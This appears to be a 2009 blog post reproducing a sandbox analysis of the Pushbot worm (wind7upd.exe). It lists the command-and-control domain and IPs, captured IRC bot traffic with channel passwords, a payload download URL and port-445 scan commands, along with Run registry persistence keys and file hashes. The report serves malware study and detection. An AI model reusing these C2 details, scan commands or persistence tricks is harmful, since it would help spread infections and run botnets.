hot.jatajoo.ru

By Pig, December 3, 2009

Remote Host Port Number
174.133.222.172 445
195.190.13.188 7272
222.231.29.29 7272
89.149.244.22 80

* The data identified by the following URL was then requested from the remote web server:
o http://hot.jatajoo.ru/hot.php

NICK [N00_USA_XP_5605087]
USER SP2-366 * 0 :COMPUTERNAME
JOIN #nit open
PRIVMSG #modes2 :HTTP SET http://rapidshare.com/files/315648191/rost
PRIVMSG #nit :scan// Random Port Scan started on 174.133.x.x:445 with a delay of 3 seconds for 0 minutes using 35 threads.
PRIVMSG #modes2 :WIN2K Host [174.133.222.172:445]
PRIVMSG #nit :scan// Random Port Scan started on 174.x.x.x:445 with a delay of 3 seconds for 0 minutes using 15 threads.
MODE #nit -ix
NICK [00_USA_XP_6917766]
USER SP2-089 * 0 :COMPUTERNAME
MODE [00_USA_XP_6917766] -ix

PASS pacodedd
PASS dddd

Other details

* The following ports were open in the system:

Port Protocol Process
1052 TCP wind7upd.exe (%Windir%wind7upd.exe)
1053 TCP wind7upd.exe (%Windir%wind7upd.exe)
1054 TCP wind7upd.exe (%Windir%wind7upd.exe)
1055 TCP wind7upd.exe (%Windir%wind7upd.exe)
1061 TCP wind7upd.exe (%Windir%wind7upd.exe)
1062 TCP wind7upd.exe (%Windir%wind7upd.exe)
1278 TCP wind7upd.exe (%Windir%wind7upd.exe)
2379 TCP wind7upd.exe (%Windir%wind7upd.exe)
2380 TCP wind7upd.exe (%Windir%wind7upd.exe)
2381 TCP wind7upd.exe (%Windir%wind7upd.exe)
2382 TCP wind7upd.exe (%Windir%wind7upd.exe)
2383 TCP wind7upd.exe (%Windir%wind7upd.exe)
2384 TCP wind7upd.exe (%Windir%wind7upd.exe)
2385 TCP wind7upd.exe (%Windir%wind7upd.exe)
2386 TCP wind7upd.exe (%Windir%wind7upd.exe)
2387 TCP wind7upd.exe (%Windir%wind7upd.exe)
2388 TCP wind7upd.exe (%Windir%wind7upd.exe)
2389 TCP wind7upd.exe (%Windir%wind7upd.exe)
2390 TCP wind7upd.exe (%Windir%wind7upd.exe)
2391 TCP wind7upd.exe (%Windir%wind7upd.exe)
2392 TCP wind7upd.exe (%Windir%wind7upd.exe)
2393 TCP wind7upd.exe (%Windir%wind7upd.exe)
2394 TCP wind7upd.exe (%Windir%wind7upd.exe)
2395 TCP wind7upd.exe (%Windir%wind7upd.exe)
2396 TCP wind7upd.exe (%Windir%wind7upd.exe)
2397 TCP wind7upd.exe (%Windir%wind7upd.exe)
2398 TCP wind7upd.exe (%Windir%wind7upd.exe)
2399 TCP wind7upd.exe (%Windir%wind7upd.exe)
2400 TCP wind7upd.exe (%Windir%wind7upd.exe)
2401 TCP wind7upd.exe (%Windir%wind7upd.exe)
2402 TCP wind7upd.exe (%Windir%wind7upd.exe)
2403 TCP wind7upd.exe (%Windir%wind7upd.exe)
2404 TCP wind7upd.exe (%Windir%wind7upd.exe)
2405 TCP wind7upd.exe (%Windir%wind7upd.exe)
2406 TCP wind7upd.exe (%Windir%wind7upd.exe)
2407 TCP wind7upd.exe (%Windir%wind7upd.exe)
2408 TCP wind7upd.exe (%Windir%wind7upd.exe)
2409 TCP wind7upd.exe (%Windir%wind7upd.exe)
2410 TCP wind7upd.exe (%Windir%wind7upd.exe)
2411 TCP wind7upd.exe (%Windir%wind7upd.exe)
2412 TCP wind7upd.exe (%Windir%wind7upd.exe)
2413 TCP wind7upd.exe (%Windir%wind7upd.exe)
2414 TCP wind7upd.exe (%Windir%wind7upd.exe)
2415 TCP wind7upd.exe (%Windir%wind7upd.exe)
2416 TCP wind7upd.exe (%Windir%wind7upd.exe)
2417 TCP wind7upd.exe (%Windir%wind7upd.exe)
2418 TCP wind7upd.exe (%Windir%wind7upd.exe)
2419 TCP wind7upd.exe (%Windir%wind7upd.exe)
2420 TCP wind7upd.exe (%Windir%wind7upd.exe)
2421 TCP wind7upd.exe (%Windir%wind7upd.exe)
2422 TCP wind7upd.exe (%Windir%wind7upd.exe)
2423 TCP wind7upd.exe (%Windir%wind7upd.exe)
2424 TCP wind7upd.exe (%Windir%wind7upd.exe)
2425 TCP wind7upd.exe (%Windir%wind7upd.exe)
2426 TCP wind7upd.exe (%Windir%wind7upd.exe)
2427 TCP wind7upd.exe (%Windir%wind7upd.exe)
2428 TCP wind7upd.exe (%Windir%wind7upd.exe)
2429 TCP wind7upd.exe (%Windir%wind7upd.exe)
2430 TCP wind7upd.exe (%Windir%wind7upd.exe)
2431 TCP wind7upd.exe (%Windir%wind7upd.exe)
2432 TCP wind7upd.exe (%Windir%wind7upd.exe)
2433 TCP wind7upd.exe (%Windir%wind7upd.exe)
2434 TCP wind7upd.exe (%Windir%wind7upd.exe)
2435 TCP wind7upd.exe (%Windir%wind7upd.exe)
2436 TCP wind7upd.exe (%Windir%wind7upd.exe)
2437 TCP wind7upd.exe (%Windir%wind7upd.exe)
2438 TCP wind7upd.exe (%Windir%wind7upd.exe)
2439 TCP wind7upd.exe (%Windir%wind7upd.exe)
2440 TCP wind7upd.exe (%Windir%wind7upd.exe)
2441 TCP wind7upd.exe (%Windir%wind7upd.exe)
2442 TCP wind7upd.exe (%Windir%wind7upd.exe)
2443 TCP wind7upd.exe (%Windir%wind7upd.exe)
2444 TCP wind7upd.exe (%Windir%wind7upd.exe)
2445 TCP wind7upd.exe (%Windir%wind7upd.exe)
2446 TCP wind7upd.exe (%Windir%wind7upd.exe)
2447 TCP wind7upd.exe (%Windir%wind7upd.exe)
2448 TCP wind7upd.exe (%Windir%wind7upd.exe)
2449 TCP wind7upd.exe (%Windir%wind7upd.exe)
2450 TCP wind7upd.exe (%Windir%wind7upd.exe)
2451 TCP wind7upd.exe (%Windir%wind7upd.exe)
2452 TCP wind7upd.exe (%Windir%wind7upd.exe)
2453 TCP wind7upd.exe (%Windir%wind7upd.exe)
2454 TCP wind7upd.exe (%Windir%wind7upd.exe)
2455 TCP wind7upd.exe (%Windir%wind7upd.exe)
2456 TCP wind7upd.exe (%Windir%wind7upd.exe)
2457 TCP wind7upd.exe (%Windir%wind7upd.exe)
2458 TCP wind7upd.exe (%Windir%wind7upd.exe)
2459 TCP wind7upd.exe (%Windir%wind7upd.exe)
2460 TCP wind7upd.exe (%Windir%wind7upd.exe)
2461 TCP wind7upd.exe (%Windir%wind7upd.exe)
2462 TCP wind7upd.exe (%Windir%wind7upd.exe)
2463 TCP wind7upd.exe (%Windir%wind7upd.exe)
2464 TCP wind7upd.exe (%Windir%wind7upd.exe)
2465 TCP wind7upd.exe (%Windir%wind7upd.exe)
2466 TCP wind7upd.exe (%Windir%wind7upd.exe)
2467 TCP wind7upd.exe (%Windir%wind7upd.exe)
2468 TCP wind7upd.exe (%Windir%wind7upd.exe)
2469 TCP wind7upd.exe (%Windir%wind7upd.exe)
2470 TCP wind7upd.exe (%Windir%wind7upd.exe)
2471 TCP wind7upd.exe (%Windir%wind7upd.exe)

Registry Modifications

* The following Registry Keys were created:
o HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorer
o HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorerRun

* The newly created Registry Values are:
o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorerRun]
+ Microsoft Driver Setup = “%Windir%wind7upd.exe”

so that wind7upd.exe runs every time Windows starts
o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
+ Microsoft Driver Setup = “%Windir%wind7upd.exe”

so that wind7upd.exe runs every time Windows starts

Memory Modifications

* There was a new process created in the system:

Process Name Process Filename Main Module Size
wind7upd.exe %Windir%wind7upd.exe 339 968 bytes

File System Modifications

* The following files were created in the system:

# Filename(s) File Size File Hash Alias
1 %Windir%logfile32.txt 0 bytes MD5: 0xD41D8CD98F00B204E9800998ECF8427E
SHA-1: 0xDA39A3EE5E6B4B0D3255BFEF95601890AFD80709 (not available)
2 [file and pathname of the sample #1]
%Windir%wind7upd.exe 102 912 bytes MD5: 0x0F90BAEF1C2D1CF19D6BB99325F98F24
SHA-1: 0x3A8B24AE9D74784F335B9D4A795DA1410049B55F Worm:Win32/Pushbot.gen [Microsoft]

Categories: Uncategorized
Previous post
Next post